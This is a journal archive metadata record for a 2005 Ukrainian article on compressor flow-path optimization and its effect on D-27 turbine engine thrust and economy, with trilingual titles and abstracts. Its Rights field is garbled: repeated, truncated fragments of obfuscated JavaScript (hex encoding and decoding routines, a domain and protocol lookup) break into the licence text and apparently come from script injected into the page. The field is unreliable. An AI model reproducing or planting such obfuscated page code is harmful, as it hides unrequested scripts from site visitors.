Record Details

INFLUENCE OF AXIAL COMPRESSOR STAGE SPATIAL OPTIMIZATION ON THRUST-ECONOMICAL CHARACTERISTICS OF CARGO AIRCRAFT GAS TURBINE ENGINE

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title INFLUENCE OF AXIAL COMPRESSOR STAGE SPATIAL OPTIMIZATION ON THRUST-ECONOMICAL CHARACTERISTICS OF CARGO AIRCRAFT GAS TURBINE ENGINE
Влияние пространственной оптимизации ступеней осевого компрессора на тягово-економичные характеристики газотурбинного двигателя транспортного самолета
Вплив просторової оптимізації ступенів осьового компресора на тягово-економічні характеристики газотурбінного двигуна транспортного літака
 
Creator Volyanskaya, L.G.
Grekov, P.I.
Yurсhenko, O.V.
 
Subject


 
Description  The article considers the research results of D-27 gas turbine engine thrust-economical characteristics change due to of axial compressor flow path optimization. The applied procedure of optimization takes into account a difference in the shapes of axial compressor stage blades at rest and design mode, redistribution of kinetic energy losses along the blade height. The estimation of parameters of a gas flow in the stage flow path is made by the solution of Navier-Stokes equation complete set.
 Изложены результаты исследований изменения тягово-економичных характеристик турбовинтового двигателя Д-27 в результате проведения оптимизации проточной части осевого компрессора. Использованная методика оптимизации учитывает разницу между формами рабочих лопаток, ступенью осевого компрессора в состоянии покоя, при работе на расчетном режиме и перераспределение затрат кинетической энергии по высоте лопатки. Параметры газового потока в проточной части ступени определены с помощью решения полной системы уравнений Навье-Стокса.   
 Викладено результати дослідження зміни тягово-економічних характеристик турбогвинтового двигуна Д-27 у результаті проведення оптимізації проточної частини осьового компресора. Застосована методика оптимізації враховує різницю між формами робочих лопаток, ступенем осьового компресора в стані спокою, при роботі на розрахунковому режимі та перерозподіл втрат кінетичної енергії за висотою лопатки. Параметри газового потоку в проточній частині ступеня обчислено за допомогою розв’язання повної системи рівнянь Нав’є-Стокса.
 
Publisher National Aviation University
 
Contributor


 
Date 2005-02-01
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/1138
10.18372/2306-1472.24.1138
 
Source Proceedings of the National Aviation University; Том 24, № 2 (2005); 34-38
Вестник Национального авиационного университета; Том 24, № 2 (2005); 34-38
Вісник Національного Авіаційного Університету; Том 24, № 2 (2005); 34-38
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ